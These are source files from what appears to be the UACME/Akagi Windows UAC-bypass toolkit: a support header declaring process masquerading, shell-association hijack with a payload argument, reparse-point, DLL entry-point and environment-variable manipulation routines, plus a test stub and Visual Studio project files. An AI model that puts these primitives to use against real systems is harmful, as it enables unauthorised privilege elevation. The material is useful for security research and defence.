"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n* TITLE: SUP.H\n*\n* VERSION: 3.68\n*\n* DATE: 07 Mar 2025\n*\n* Common header file for the program support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\ntypedef int(__cdecl* pswprintf_s)(\n wchar_t* buffer,\n size_t sizeOfBuffer,\n const wchar_t* format,\n ...);\n\n#define TEXT_SECTION \".text\"\n#define TEXT_SECTION_LEGNTH sizeof(TEXT_SECTION)\n\n//\n// Shell association start.\n//\n\ntypedef enum {\n UASET_CLEAR = 0,\n UASET_APPLICATION,\n UASET_PROGID,\n} UASET;\n\ntypedef HRESULT(WINAPI* pfnUserAssocSet)(\n UASET set,\n LPCWSTR pszExt,\n LPCWSTR pszSet);\n\ntypedef HRESULT(WINAPI* pfnUserAssocSet2)(\n UASET set,\n LPCWSTR pszExt,\n LPCWSTR pszSet,\n ULONG dwFlags);\n\ntypedef struct _USER_ASSOC_PTR {\n union {\n pfnUserAssocSet UserAssocSet;\n pfnUserAssocSet2 UserAssocSet2; //Win10 1904 1909\n } DUMMYUNIONNAME;\n BOOL Valid;\n} USER_ASSOC_PTR, * PUSER_ASSOC_PTR;\n\ntypedef struct USER_ASSOC_PATTERN {\n PVOID Ptr;\n DWORD Size;\n} USER_ASSOC_PATTERN, * PUSER_ASSOC_PATTERN;\n\ntypedef struct USER_ASSOC_SIGNATURE {\n ULONG NtBuildMin;\n ULONG NtBuildMax;\n ULONG PatternsCount;\n PVOID PatternsTable;\n} USER_ASSOC_SIGNATURE, * PUSER_ASSOC_SIGNATURE;\n\ntypedef VOID(WINAPI* PSUP_UAS_ENUMERATION_CALLBACK_FUNCTION)(\n _In_ PUSER_ASSOC_SIGNATURE Signature,\n _In_opt_ PVOID Context,\n _Inout_ BOOLEAN* StopEnumeration\n );\n\n//\n// Shell association end.\n//\n\ntypedef struct _SXS_SEARCH_CONTEXT {\n LPWSTR DllName;\n LPWSTR SxsKey;\n LPWSTR FullDllPath;\n} SXS_SEARCH_CONTEXT, *PSXS_SEARCH_CONTEXT;\n\n//ntifs.h\ntypedef struct _REPARSE_DATA_BUFFER {\n ULONG ReparseTag;\n USHORT ReparseDataLength;\n USHORT Reserved;\n union {\n struct {\n USHORT SubstituteNameOffset;\n USHORT SubstituteNameLength;\n USHORT PrintNameOffset;\n USHORT PrintNameLength;\n ULONG Flags;\n WCHAR PathBuffer[1];\n } SymbolicLinkReparseBuffer;\n struct {\n USHORT SubstituteNameOffset;\n USHORT SubstituteNameLength;\n USHORT PrintNameOffset;\n USHORT PrintNameLength;\n WCHAR PathBuffer[1];\n } MountPointReparseBuffer;\n struct {\n UCHAR DataBuffer[1];\n } GenericReparseBuffer;\n } DUMMYUNIONNAME;\n} REPARSE_DATA_BUFFER, *PREPARSE_DATA_BUFFER;\n\n#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer)\n\n\n//\n// Memory allocator flags.\n//\n#define DEFAULT_ALLOCATION_TYPE MEM_COMMIT | MEM_RESERVE\n#define DEFAULT_PROTECT_TYPE PAGE_READWRITE\n\n//\n// sup* prototypes\n//\n\nVOID supSetLastErrorFromNtStatus(\n _In_ NTSTATUS LastNtStatus);\n\nBOOLEAN supIsProcess32bit(\n _In_ HANDLE hProcess);\n\nBOOL supGetElevationType(\n _Out_ TOKEN_ELEVATION_TYPE *lpType);\n\nBOOL supWriteBufferToFile(\n _In_ LPCWSTR lpFileName,\n _In_opt_ PVOID Buffer,\n _In_ DWORD BufferSize);\n\nBOOL supDecodeAndWriteBufferToFile(\n _In_ LPWSTR lpFileName,\n _In_ CONST PVOID Buffer,\n _In_ DWORD BufferSize,\n _In_ ULONG Key);\n\nPBYTE supReadFileToBuffer(\n _In_ LPCWSTR lpFileName,\n _Inout_opt_ LPDWORD lpBufferSize);\n\nHANDLE supRunProcess3(\n _In_ LPCWSTR lpFile,\n _In_opt_ LPCWSTR lpParameters,\n _In_opt_ LPCWSTR lpVerb,\n _In_ INT nShow);\n\nBOOL supRunProcess2(\n _In_ LPCWSTR lpFile,\n _In_opt_ LPCWSTR lpParameters,\n _In_opt_ LPCWSTR lpVerb,\n _In_ INT nShow,\n _In_ ULONG mTimeOut);\n\nBOOL supRunProcess(\n _In_ LPCWSTR lpFile,\n _In_opt_ LPCWSTR lpParameters);\n\nvoid supCopyMemory(\n _Inout_ void *dest,\n _In_ size_t cbdest,\n _In_ const void *src,\n _In_ size_t cbsrc);\n\nLPWSTR supQueryEnvironmentVariableOffset(\n _In_ PUNICODE_STRING Value);\n\nDWORD supCalculateCheckSumForMappedFile(\n _In_ PVOID BaseAddress,\n _In_ ULONG FileLength);\n\nBOOLEAN supVerifyMappedImageMatchesChecksum(\n _In_ PVOID BaseAddress,\n _In_ ULONG FileLength);\n\nBOOLEAN supSetCheckSumForMappedFile(\n _In_ PVOID BaseAddress,\n _In_ ULONG CheckSum);\n\nNTSTATUS supLdrQueryResourceDataEx(\n _In_ ULONG_PTR ResourceId,\n _In_ PVOID DllHandle,\n _Out_ PULONG DataSize,\n _Out_ PVOID* Data);\n\nPBYTE supLdrQueryResourceData(\n _In_ ULONG_PTR ResourceId,\n _In_ PVOID DllHandle,\n _Out_ PULONG DataSize);\n\nVOID supMasqueradeProcess(\n _In_ BOOL Restore);\n\nDWORD supExpandEnvironmentStrings(\n _In_ LPCWSTR lpSrc,\n _In_ LPWSTR lpDst,\n _In_ DWORD nSize);\n\nBOOL sxsFindLoaderEntry(\n _In_ PSXS_SEARCH_CONTEXT Context);\n\nVOID supDebugPrint(\n _In_ LPCWSTR ApiName,\n _In_ DWORD status);\n\nPVOID supVirtualAlloc(\n _Inout_ PSIZE_T Size,\n _In_ ULONG AllocationType,\n _In_ ULONG Protect,\n _Out_opt_ NTSTATUS *Status);\n\nBOOL supVirtualFree(\n _In_ PVOID Memory,\n _Out_opt_ NTSTATUS *Status);\n\nBOOL supSecureVirtualFree(\n _In_ PVOID Memory,\n _In_ SIZE_T MemorySize,\n _Out_opt_ NTSTATUS *Status);\n\nPVOID FORCEINLINE supHeapAlloc(\n _In_ SIZE_T Size);\n\nBOOL FORCEINLINE supHeapFree(\n _In_ PVOID Memory);\n\nBOOL supRegDeleteKeyRecursive(\n _In_ HKEY hKeyRoot,\n _In_ LPCWSTR lpSubKey);\n\nBOOL supSetEnvVariableEx(\n _In_ BOOL fRemove,\n _In_opt_ LPWSTR lpKeyName,\n _In_ LPCWSTR lpVariableName,\n _In_opt_ LPCWSTR lpVariableData);\n\nBOOL supSetEnvVariable(\n _In_ BOOL fRemove,\n _In_opt_ LPWSTR lpKeyName,\n _In_ LPCWSTR lpVariableName,\n _In_opt_ LPCWSTR lpVariableData);\n\nBOOL supSetEnvVariable2(\n _In_ BOOL fRemove,\n _In_opt_ LPWSTR lpKeyName,\n _In_ LPCWSTR lpVariableName,\n _In_opt_ LPCWSTR lpVariableData);\n\n_Success_(return)\nBOOL supReplaceEnvironmentVariableValue(\n _In_opt_ LPWSTR lpKeyName,\n _In_ LPWSTR lpVariableName,\n _In_ DWORD dwType,\n _In_opt_ LPWSTR lpVariableData,\n _Out_opt_ PVOID* lpOldVariableData);\n\nBOOL supSetMountPoint(\n _In_ HANDLE hDirectory,\n _In_ LPCWSTR lpTarget,\n _In_ LPCWSTR lpPrintName);\n\nBOOL supDeleteMountPoint(\n _In_ HANDLE hDirectory);\n\nHANDLE supOpenDirectoryForReparse(\n _In_ LPCWSTR lpDirectory);\n\nBOOL supWinstationToName(\n _In_opt_ HWINSTA hWinsta,\n _In_ LPWSTR lpBuffer,\n _In_ DWORD cbBuffer,\n _Out_ PDWORD BytesNeeded);\n\nBOOL supDesktopToName(\n _In_opt_ HDESK hDesktop,\n _In_ LPWSTR lpBuffer,\n _In_ DWORD cbBuffer,\n _Out_ PDWORD BytesNeeded);\n\nBOOL supReplaceDllEntryPoint(\n _In_ PVOID DllImage,\n _In_ ULONG SizeOfDllImage,\n _In_ LPCSTR lpEntryPointName,\n _In_ BOOL fConvertToExe);\n\nNTSTATUS supRegWriteValue(\n _In_ HANDLE hKey,\n _In_opt_ LPWSTR ValueName,\n _In_ DWORD ValueType,\n _In_ PVOID ValueData,\n _In_ ULONG ValueDataSize);\n\nNTSTATUS supRegReadValue(\n _In_ HANDLE hKey,\n _In_ LPWSTR ValueName,\n _In_ DWORD ValueType,\n _Out_ PVOID *Buffer,\n _Out_ ULONG *BufferSize,\n _In_opt_ HANDLE hHeap);\n\nNTSTATUS supRegCurrentUserDeleteSubKeyValue(\n _In_ LPWSTR SubKey,\n _In_ LPWSTR ValueName);\n\nBOOL supQuerySystemRoot(\n _Inout_ PVOID Context);\n\nPVOID supGetSystemInfo(\n _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass);\n\nBOOL supIsCorImageFile(\n _In_ PVOID ImageBase);\n\nPVOID supEncodePointer(\n _In_ PVOID Pointer);\n\nPVOID supDecodePointer(\n _In_ PVOID Pointer);\n\nNTSTATUS supCreateDirectory(\n _Out_opt_ PHANDLE phDirectory,\n _In_ OBJECT_ATTRIBUTES *ObjectAttributes,\n _In_ ULONG DirectoryShareFlags,\n _In_ ULONG DirectoryAttributes);\n\nBOOL supCreateSharedParametersBlock(\n _In_ PVOID ucmContext);\n\nVOID supDestroySharedParametersBlock(\n _In_ PVOID ucmContext);\n\nPVOID supCreateUacmeContext(\n _In_ ULONG Method,\n _In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,\n _In_ ULONG OptionalParameterLength,\n _In_ PVOID DecompressRoutine);\n\nVOID supDestroyUacmeContext(\n _In_ PVOID Context);\n\nNTSTATUS supEnableDisableWow64Redirection(\n _In_ BOOL bDisable);\n\nNTSTATUS supGetProcessDebugObject(\n _In_ HANDLE ProcessHandle,\n _Out_ PHANDLE DebugObjectHandle);\n\nBOOL supIsProcessRunning(\n _In_ LPWSTR ProcessName);\n\nvoid supBinTextEncode(\n _In_ unsigned __int64 x,\n _Inout_ wchar_t* s);\n\nVOID supGenerateSharedObjectName(\n _In_ WORD ObjectId,\n _Inout_ LPWSTR lpBuffer);\n\nVOID supSetGlobalCompletionEvent(\n VOID);\n\nNTSTATUS supWaitForGlobalCompletionEvent(\n VOID);\n\nNTSTATUS supOpenClassesKey(\n _In_opt_ PUNICODE_STRING UserRegEntry,\n _Out_ PHANDLE KeyHandle);\n\nNTSTATUS supRemoveRegLinkHKCU(\n _In_ LPWSTR lpszRegLink);\n\nPVOID supFindPattern(\n _In_ CONST PBYTE Buffer,\n _In_ SIZE_T BufferSize,\n _In_ CONST PBYTE Pattern,\n _In_ SIZE_T PatternSize);\n\nPVOID supLookupImageSectionByName(\n _In_ CHAR* SectionName,\n _In_ ULONG SectionNameLength,\n _In_ PVOID DllBase,\n _Out_ PULONG SectionSize);\n\nNTSTATUS supFindUserAssocSet(\n _Out_ USER_ASSOC_PTR* Function);\n\nPUSER_ASSOC_SIGNATURE supGetUserAssocSetDB(\n _Out_opt_ PULONG SignatureCount);\n\nVOID supEnumUserAssocSetDB(\n _In_ PSUP_UAS_ENUMERATION_CALLBACK_FUNCTION Callback,\n _In_opt_ PVOID Context);\n\nNTSTATUS supRegisterShellAssoc(\n _In_ LPCWSTR pszExt,\n _In_ LPCWSTR pszProgId,\n _In_ USER_ASSOC_PTR* UserAssocFunc,\n _In_ LPCWSTR lpszPayload,\n _In_ BOOL fCustomURIScheme,\n _In_opt_ LPCWSTR pszDefaultValue);\n\nNTSTATUS supUnregisterShellAssocEx(\n _In_ BOOLEAN fResetOnly,\n _In_ LPCWSTR pszExt,\n _In_opt_ LPCWSTR pszProgId,\n _In_ USER_ASSOC_PTR* UserAssocFunc);\n\nNTSTATUS supUnregisterShellAssoc(\n _In_ LPCWSTR pszExt,\n _In_ LPCWSTR pszProgId,\n _In_ USER_ASSOC_PTR* UserAssocFunc);\n\nNTSTATUS supResetShellAssoc(\n _In_ LPCWSTR pszExt,\n _In_opt_ LPCWSTR pszProgId,\n _In_ USER_ASSOC_PTR* UserAssocFunc);\n\nBOOL supStopTaskByName(\n _In_ LPCWSTR TaskFolder,\n _In_ LPCWSTR TaskName);\n\nLPWSTR supPathAddBackSlash(\n _In_ LPWSTR lpszPath);\n\nHANDLE supOpenShellProcess(\n _In_ ULONG dwDesiredAccess);\n\nHANDLE supRunProcessFromParent(\n _In_ HANDLE hParentProcess,\n _Inout_opt_ LPWSTR lpApplicationName,\n _In_ LPWSTR lpszParameters,\n _In_opt_ LPWSTR lpCurrentDirectory,\n _In_ ULONG CreationFlags,\n _In_ WORD ShowWindowFlags,\n _Out_opt_ HANDLE* PrimaryThread);\n\nRPC_STATUS supCreateBindingHandle(\n _In_ RPC_WSTR RpcInterfaceUuid,\n _Out_ RPC_BINDING_HANDLE* BindingHandle);\n\nBOOL supConcatenatePaths(\n _Inout_ LPWSTR Target,\n _In_ LPCWSTR Path,\n _In_ SIZE_T TargetBufferSize);\n\ntypedef BOOL(CALLBACK* pfnEnumProcessCallback)(\n _In_ PSYSTEM_PROCESS_INFORMATION ProcessEntry,\n _In_opt_ PVOID UserContext\n );\n\nBOOL supEnumProcessesForSession(\n _In_ ULONG SessionId,\n _In_ pfnEnumProcessCallback Callback,\n _In_opt_ PVOID UserContext);\n\nBOOL supRemoveDirectoryRecursive(\n _In_ LPCWSTR Path);\n\nVOID supEnableToastForProtocol(\n _In_ LPCWSTR lpProtocol,\n _In_ BOOL fEnable);\n\nULONG supWaitForChildProcesses(\n _In_ LPCWSTR lpProcessName,\n _In_ DWORD dwWaitMiliseconds);\n\nVOID supRaiseHardError(\n _In_ NTSTATUS HardErrorStatus);\n\nBOOL supGetThreadTokenImpersonationLevel(\n _In_ HANDLE ThreadHandle,\n _Out_ PSECURITY_IMPERSONATION_LEVEL ImpersonationLevel);\n\nULONGLONG supGetTickCount64(\n VOID);\n\nBOOL CALLBACK supEnumTaskhostTasksCallback(\n _In_ PSYSTEM_PROCESS_INFORMATION ProcessEntry,\n _In_ PVOID UserContext);\n\nBOOLEAN supStartScheduledTask(\n _In_ LPCWSTR lpTaskFolder,\n _In_ LPCWSTR lpTaskName);\n\nBOOLEAN supReplaceVersionInfo(\n _In_ LPCWSTR lpFileName,\n _In_ PBYTE lpResource,\n _In_ DWORD dwResourceSize,\n _In_ DWORD dwKey);\n\n#ifdef _DEBUG\n#define supDbgMsg(Message) OutputDebugString(Message)\n#else\n#define supDbgMsg(Message) \n#endif\n\n#define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1)\n"
},
{
"path": "Source/Akagi/tests/test.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2017 - 2022\n*\n* TITLE: TEST.C\n*\n* VERSION: 3.61\n*\n* DATE: 22 Jun 2022\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\nVOID WINAPI TestEnumDB(\n _In_ PUSER_ASSOC_SIGNATURE Signature,\n _In_opt_ PVOID Context,\n _Inout_ BOOLEAN* StopEnumeration\n)\n{\n WCHAR szBuffer[MAX_PATH + 1];\n\n UNREFERENCED_PARAMETER(Context);\n\n _strcpy(szBuffer, TEXT(\"\\r\\nSign->NtBuildMin: \"));\n ultostr(Signature->NtBuildMin, _strend(szBuffer));\n _strcat(szBuffer, TEXT(\"\\r\\n\"));\n\n _strcat(szBuffer, TEXT(\"Sign->NtBuildMax: \"));\n ultostr(Signature->NtBuildMax, _strend(szBuffer));\n _strcat(szBuffer, TEXT(\"\\r\\n\"));\n\n _strcat(szBuffer, TEXT(\"Sign->PatternsCount: \"));\n ultostr(Signature->PatternsCount, _strend(szBuffer));\n _strcat(szBuffer, TEXT(\"\\r\\n\"));\n\n _strcat(szBuffer, TEXT(\"Sign->PatternsTable: 0x\"));\n u64tohex((ULONG_PTR)Signature->PatternsTable, _strend(szBuffer));\n _strcat(szBuffer, TEXT(\"\\r\\n------------------\"));\n\n OutputDebugString(szBuffer);\n\n *StopEnumeration = FALSE;\n}\n\nVOID TestEnumUAS()\n{ \n supEnumUserAssocSetDB((PSUP_UAS_ENUMERATION_CALLBACK_FUNCTION)TestEnumDB, NULL);\n}\n\n/*\n* ucmTestRoutine\n*\n* Purpose:\n*\n* Test routine, can serve multiple purposes.\n*\n*/\nBOOL ucmTestRoutine(\n _In_opt_ PVOID PayloadCode,\n _In_ ULONG PayloadSize)\n{\n UNREFERENCED_PARAMETER(PayloadCode);\n UNREFERENCED_PARAMETER(PayloadSize);\n\n //TestEnumUAS();\n\n supSetGlobalCompletionEvent();\n return TRUE;\n}\n"
},
{
"path": "Source/Akagi/tests/test.h",
"content": "#/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2017 - 2022\n*\n* TITLE: TEST.H\n*\n* VERSION: 3.61\n*\n* DATE: 22 Jun 2022\n*\n* Test unit header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\ntypedef interface ITestInterface ITestInterface;\n\ntypedef HRESULT (STDMETHODCALLTYPE *MethodPfn)(\n __RPC__in ITestInterface * This);\n\ntypedef struct ITestInterfaceVtbl {\n\n BEGIN_INTERFACE\n\n HRESULT(STDMETHODCALLTYPE *QueryInterface)(\n __RPC__in ITestInterface * This,\n __RPC__in REFIID riid,\n _COM_Outptr_ void **ppvObject);\n\n\n ULONG(STDMETHODCALLTYPE *AddRef)(\n __RPC__in ITestInterface * This);\n\n ULONG(STDMETHODCALLTYPE *Release)(\n __RPC__in ITestInterface * This);\n\n MethodPfn a[200];\n\n\n/* HRESULT(STDMETHODCALLTYPE *Method1)(\n __RPC__in ITestInterface * This);\n\n HRESULT(STDMETHODCALLTYPE *Method2)(\n __RPC__in ITestInterface * This);\n\n HRESULT(STDMETHODCALLTYPE *Method3)(\n __RPC__in ITestInterface * This);\n\n HRESULT(STDMETHODCALLTYPE *Method4)(\n __RPC__in ITestInterface * This);\n\n HRESULT(STDMETHODCALLTYPE *Method5)(\n __RPC__in ITestInterface * This);\n\n HRESULT(STDMETHODCALLTYPE *Method6)(\n __RPC__in ITestInterface * This);\n\n HRESULT(STDMETHODCALLTYPE *Method7)(\n __RPC__in ITestInterface * This);\n\n HRESULT(STDMETHODCALLTYPE *Method8)(\n __RPC__in ITestInterface * This);\n\n HRESULT(STDMETHODCALLTYPE *Method9)(\n __RPC__in ITestInterface * This);\n\n HRESULT(STDMETHODCALLTYPE *Method10)(\n __RPC__in ITestInterface * This);\n\n HRESULT(STDMETHODCALLTYPE *Method11)(\n __RPC__in ITestInterface * This);\n\n HRESULT(STDMETHODCALLTYPE *Method12)(\n __RPC__in ITestInterface * This);\n\n HRESULT(STDMETHODCALLTYPE *Method13)(\n __RPC__in ITestInterface * This);\n\n HRESULT(STDMETHODCALLTYPE *Method14)(\n __RPC__in ITestInterface * This);\n\n HRESULT(STDMETHODCALLTYPE *Method15)(\n __RPC__in ITestInterface * This);\n\n HRESULT(STDMETHODCALLTYPE *Method16)(\n __RPC__in ITestInterface * This);*/\n\n END_INTERFACE\n\n} *PITestInterfaceVtbl;\n\ninterface ITestInterface\n{\n CONST_VTBL struct ITestInterfaceVtbl *lpVtbl;\n};\n\nBOOL ucmTestRoutine(\n _In_opt_ PVOID PayloadCode, \n _In_ ULONG PayloadSize);\n"
},
{
"path": "Source/Akagi/uacme.vcxproj",
"content": "\n\n \n \n DebugConsole\n Win32\n \n \n DebugConsole\n x64\n \n \n Debug\n Win32\n \n \n Debug\n x64\n \n \n ReleaseInternalConsole\n Win32\n \n \n ReleaseInternalConsole\n x64\n \n \n ReleaseInternal\n Win32\n \n \n ReleaseInternal\n x64\n \n \n Release\n Win32\n \n \n Release\n x64\n \n \n \n {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}\n Win32Proj\n uacme\n Akagi\n 10.0\n \n \n \n Application\n true\n v145\n Unicode\n \n \n Application\n true\n v145\n Unicode\n \n \n true\n v145\n Unicode\n false\n \n \n true\n v145\n Unicode\n false\n \n \n false\n v145\n true\n Unicode\n \n \n Application\n false\n v145\n true\n Unicode\n \n \n Application\n false\n v145\n true\n Unicode\n \n \n false\n v145\n true\n Unicode\n false\n \n \n false\n v145\n true\n Unicode\n false\n \n \n false\n v145\n true\n Unicode\n false\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n AllRules.ruleset\n false\n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n AllRules.ruleset\n false\n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n AllRules.ruleset\n false\n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n AllRules.ruleset\n false\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n NativeRecommendedRules.ruleset\n $(ProjectName)32\n false\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n NativeRecommendedRules.ruleset\n $(ProjectName)32\n true\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n NativeRecommendedRules.ruleset\n $(ProjectName)32Con\n true\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n $(ProjectName)64\n AllRules.ruleset\n false\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n $(ProjectName)64\n AllRules.ruleset\n true\n true\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n $(ProjectName)64Con\n AllRules.ruleset\n true\n true\n \n \n \n \n \n Level4\n Disabled\n WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)\n true\n false\n $(ProjectDir);$(SolutionDir)\n true\n \n \n Windows\n true\n \n \n 6.1\n 6.1\n \n \n \n \n \n true\n useRc32;%(PreprocessorDefinitions)\n \n \n akagi.manifest\n \n \n \n \n \n \n Level4\n Disabled\n WIN32;_DEBUG;_WINDOWS;_UCM_CONSOLE;%(PreprocessorDefinitions)\n true\n false\n $(ProjectDir);$(SolutionDir)\n true\n \n \n Windows\n true\n \n \n 6.1\n 6.1\n \n \n \n \n \n true\n useRc32;%(PreprocessorDefinitions)\n \n \n akagi.manifest\n \n \n \n \n \n \n Level4\n Disabled\n WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)\n true\n false\n $(ProjectDir);$(SolutionDir)\n true\n \n \n Windows\n true\n \n \n 6.1\n 6.1\n \n \n \n \n \n \n true\n \n \n akagi.manifest\n \n \n \n \n \n \n Level4\n Disabled\n WIN32;_DEBUG;_WINDOWS;_UCM_CONSOLE;%(PreprocessorDefinitions)\n true\n false\n $(ProjectDir);$(SolutionDir)\n true\n \n \n Windows\n true\n \n \n 6.1\n 6.1\n \n \n \n \n \n \n true\n \n \n akagi.manifest\n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)\n Size\n false\n MultiThreaded\n CompileAsC\n true\n false\n None\n true\n true\n $(ProjectDir);$(SolutionDir)\n false\n \n \n Windows\n No\n true\n true\n \n \n true\n 6.1\n 6.1\n \n \n \n \n \n true\n useRc32;%(PreprocessorDefinitions)\n \n \n akagi.manifest\n \n \n \n \n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)\n Size\n false\n MultiThreaded\n CompileAsC\n true\n true\n None\n true\n true\n $(ProjectDir);$(SolutionDir)\n StdCall\n false\n \n \n Windows\n No\n true\n true\n \n \n true\n 6.1\n 6.1\n \n \n \n \n \n true\n useRc32;%(PreprocessorDefinitions)\n \n \n akagi.manifest\n \n \n \\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\Akagi32.exe\n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n WIN32;NDEBUG;_WINDOWS;_UCM_CONSOLE;%(PreprocessorDefinitions)\n Size\n false\n MultiThreaded\n CompileAsC\n true\n true\n None\n true\n true\n $(ProjectDir);$(SolutionDir)\n StdCall\n false\n \n \n Windows\n No\n true\n true\n \n \n true\n 6.1\n 6.1\n \n \n \n \n \n true\n useRc32;%(PreprocessorDefinitions)\n \n \n akagi.manifest\n \n \n \\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\Akagi32.exe\n \n \n \n \n Level4\n \n \n MinSpace\n true\n WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)\n Size\n false\n MultiThreaded\n CompileAsC\n true\n false\n true\n true\n $(ProjectDir);$(SolutionDir)\n false\n \n \n Windows\n false\n true\n true\n \n \n true\n 6.1\n 6.1\n \n \n \n \n \n \n true\n \n \n akagi.manifest\n \n \n \n \n \n \n \n \n Level4\n \n \n MinSpace\n true\n WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)\n Size\n false\n MultiThreaded\n CompileAsC\n true\n true\n true\n true\n $(ProjectDir);$(SolutionDir)\n false\n \n \n Windows\n true\n true\n \n \n true\n 6.1\n 6.1\n \n \n false\n \n \n \n \n true\n \n \n akagi.manifest\n \n \n \\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\Akagi64.exe\n \n \n \n \n Level4\n \n \n MinSpace\n true\n WIN32;NDEBUG;_WINDOWS;_UCM_CONSOLE;%(PreprocessorDefinitions)\n Size\n false\n MultiThreaded\n CompileAsC\n true\n true\n true\n true\n $(ProjectDir);$(SolutionDir)\n false\n \n \n Windows\n true\n true\n \n \n true\n 6.1\n 6.1\n \n \n false\n \n \n \n \n true\n \n \n akagi.manifest\n \n \n \\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\Akagi64.exe\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n true\n true\n true\n true\n true\n true\n true\n true\n true\n \n \n true\n true\n true\n true\n true\n true\n true\n true\n true\n true\n \n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"path": "Source/Akagi/uacme.vcxproj.filters",
"content": "\n\n \n \n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\n cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\n \n \n {93995380-89BD-4b04-88EB-625FBE52EBFB}\n h;hh;hpp;hxx;hm;inl;inc;xsd\n \n \n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\n \n \n {1caf2f34-af91-46be-aa2e-1893b0be628c}\n \n \n {c4fc1dcf-e216-4458-a377-e7203d627128}\n \n \n {6a18d07e-0b0d-455a-b4c2-1379f5934479}\n \n \n {751f7002-5a6c-4d2e-9296-3b8132e640f8}\n \n \n {b3b23f8d-a79f-4195-85a2-ce0665938c27}\n \n \n {1df8392c-a609-47c6-b987-44e7268833eb}\n \n \n {bf8226e8-2fd3-40d0-be5f-d04777becad3}\n \n \n {b9dae49c-a48a-4bca-9c20-5ee013126ee8}\n \n \n {3b1593e5-eb08-4b0d-a8a4-362b39344711}\n \n \n \n \n Source Files\n \n \n Source Files\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n Source Files\n \n \n minirtl\n \n \n Source Files\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n testunits\n \n \n Source Files\\methods\n \n \n Source Files\\methods\n \n \n ldr\n \n \n Source Files\\methods\n \n \n Source Files\\methods\n \n \n Source Files\n \n \n Source Files\\methods\n \n \n minirtl\n \n \n Source Files\\methods\n \n \n minirtl\n \n \n Source Files\\methods\n \n \n Source Files\\methods\n \n \n Source Files\\methods\n \n \n appinfo\n \n \n appinfo\n \n \n Source Files\n \n \n Source Files\n \n \n Source Files\\methods\n \n \n hde\n \n \n Source Files\\methods\n \n \n pcasvc\\w8_10\n \n \n pcasvc\\w8_10\n \n \n pcasvc\\w7\n \n \n 